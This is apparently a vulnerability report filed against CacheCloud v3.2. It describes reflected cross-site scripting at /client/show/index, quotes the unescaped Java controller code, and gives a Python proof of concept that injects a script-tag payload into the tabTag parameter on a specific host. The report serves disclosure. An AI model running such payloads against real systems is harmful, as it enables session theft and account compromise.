XSS vulnerability on /client/show/index #383
Description
XSS vulnerability on /client/show/index
Summary
In the latest version (v3.2) of CacheCloud, the endpoint /client/show/index does not encode user-controllable parameters when outputting them on web page, resulting in XSS vulnerability. This allows attackers to launch XSS attacks against users.
Details
- SOURCE & SINK
// src/main/java/com/sohu/cache/web/controller/AppClientDataShowController.java#L62-L89
62: @RequestMapping({"/index"})
63: public ModelAndView doIndex(HttpServletRequest request, HttpServletResponse response, Model model) {
64: Long appId = NumberUtils.toLong(request.getParameter("appId"));
65: if (appId != null && appId > 0L) {
66: AppDesc appDesc = this.appService.getByAppId(appId);
67: model.addAttribute("appId", appId);
68: model.addAttribute("appDesc", appDesc);
69: model.addAttribute("tabTag", request.getParameter("tabTag"));
70: model.addAttribute("type", request.getParameter("type"));
71: model.addAttribute("searchDate", request.getParameter("searchDate"));
72: model.addAttribute("commandStatisticsStartDate", request.getParameter("commandStatisticsStartDate"));
73: model.addAttribute("commandStatisticsEndDate", request.getParameter("commandStatisticsEndDate"));
74: model.addAttribute("exceptionStartDate", request.getParameter("exceptionStartDate"));
75: model.addAttribute("exceptionEndDate", request.getParameter("exceptionEndDate"));
76: model.addAttribute("valueDistriStartDate", request.getParameter("valueDistriStartDate"));
77: model.addAttribute("valueDistriEndDate", request.getParameter("valueDistriEndDate"));
78: model.addAttribute("costDistriStartDate", request.getParameter("costDistriStartDate"));
79: model.addAttribute("costDistriEndDate", request.getParameter("costDistriEndDate"));
80: model.addAttribute("clientIp", request.getParameter("clientIp"));
81: model.addAttribute("pageNo", request.getParameter("pageNo"));
82: model.addAttribute("firstCommand", request.getParameter("firstCommand"));
83: model.addAttribute("timeDimensionality", request.getParameter("timeDimensionality"));
84: return new ModelAndView("client/appClientIndex");
85: } else {
86: return new ModelAndView("");
87: }
88: }
89:
POC
import requests
from requests.sessions import Session
class CustomSession(Session):
def request(
self,
method,
url,
params = None,
data = None,
headers = None,
cookies = None,
files = None,
auth = None,
timeout = None,
allow_redirects = True,
proxies = None,
hooks = None,
stream = None,
verify = None,
cert = None,
json = None,
):
arg_names = (
'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout',
'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
)
local_variables = locals()
local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
local_variables['headers'] = local_variables.get('headers') or dict()
local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'})
return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://34.169.199.145:40101/client/show/index'
malicious_payload = '</SCriPT><SCRiPt>alert("zast-xss")</scRIPt>'
params = {'appId': '1', 'tabTag': malicious_payload, 'type': '', 'searchDate': '', 'commandStatisticsStartDate': '', 'commandStatisticsEndDate': '', 'exceptionStartDate': '', 'exceptionEndDate': '', 'valueDistriStartDate': '', 'valueDistriEndDate': '', 'costDistriStartDate': '', 'costDistriEndDate': '', 'clientIp': '', 'pageNo': '', 'firstCommand': '', 'timeDimensionality': ''}
response = requests.post(url, params=params, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
print('Text:', response.text)
# =================================== Poc End ====================================
- Screenshot
